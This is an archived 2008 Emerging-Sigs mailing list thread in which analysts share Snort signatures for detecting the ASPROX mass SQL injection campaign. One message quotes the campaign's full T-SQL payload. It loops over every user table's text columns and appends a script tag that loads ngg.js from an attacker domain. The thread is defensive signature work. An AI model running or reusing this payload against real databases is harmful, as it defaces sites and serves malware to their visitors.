[Emerging-Sigs] Another ASPROX Snort rule
Rodrigo Montoro(Sp0oKeR)
spooker at gmail.com
Mon Jul 7 12:49:16 EDT 2008
I think this javascript change everytime. I probably will try something to
get the attack ( http://isc.sans.org/diary.html?storyid=3823 ):
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Possible Mass SQL
Injection Detected";uricontent:"declare";nocase; uricontent: "varchar";
nocase;pcre:"/declare.+varchar.+exec/i";classtype:attempted-admin;
reference:url,http://isc.sans.org/diary.html?storyid=3823;sid:3000000;
rev:1;)
Just a simple suggestion of rule . Maybe we could make some changes .
Regards,
On Mon, Jul 7, 2008 at 1:30 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> Thanks Greg. I think this url is safer to sig than the old /b.js.
> Posting your sig now.
>
> Matt
>
> Greg Martin wrote:
> > ASPROX payload morphed
> >
> > New domains found and new javascript payload "ngg.js" replaced the
> > previous "b.js" starting just a couple of days ago. And it doesn't
> > seem to be wasting any time:
> > http://www.google.com/search?q=ngg.js Results 1 - 10 of about
> > 19,300 for ngg.js. (0.03 seconds)
> >
> > DECLARE @T VARCHAR(255), at C VARCHAR(255) DECLARE Table_Cursor CURSOR
> > FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE
> > a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231
> > OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO
> > @T, at C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+ at T+'] SET ['+ at C
> > +']=RTRIM(CONVERT(VARCHAR(4000),['+ at C+']))+''script src=
> http://www.apidad.com/ngg.js
> > /script''') FETCH NEXT FROM Table_Cursor INTO @T, at C END CLOSE
> > Table_Cursor DEALLOCATE Table_Cursor
> >
> > Snort signature to detect access of infected site:
> >
> > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX
> > Infected Site - ngg.js Request"; flow:established,to_server;
> > uricontent:"/ngg.js"; classtype:trojan-activity;
> > reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)
> >
> > -G
> >
> > Greg Martin
> > Director InfoSecurity
> > Econet Inc. - Sentinel IPS
> > 972.991.5005 x102
> > http://infosec20.blogspot.com
> >
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
--
===========================
Rodrigo Montoro (Sp0oKeR)
Security Analyst
SnortCP / RHCE / LPIC-I / MCSO
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20080707/4ce57a98/attachment.html
More information about the Emerging-sigs
mailing list